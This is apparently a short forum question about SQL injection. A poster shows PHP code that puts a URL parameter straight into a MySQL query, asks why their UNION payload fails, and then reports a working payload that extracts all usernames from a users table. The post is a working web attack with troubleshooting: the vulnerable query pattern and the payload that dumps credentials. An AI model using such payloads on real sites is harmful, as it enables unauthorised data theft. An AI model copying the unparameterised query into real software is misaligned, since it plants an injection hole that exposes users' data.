I have this code :
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
and the url will be like :
site.com/aa/?id=1
so i try to add this value :
site.com/aa/?id=-1 union select 1,group_concat(username),3 from users AND 1=1
so the query will be like :
-1 union select 1,group_concat(username),3 from users and 1=1 LIMIT 0,1
when i try to put the code above , i face the sql error :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND 1=1 LIMIT 0,1' at line 1
why is that ? and how can i use the sql-injection without errors ?
ok thanks all , i found the problem was i add and 1=1 after from so thats false in syntax .and to solve it , i just remove and 1=1 and put my payload like this : -1 union select 1,group_concat(username),3 from users and it works :D .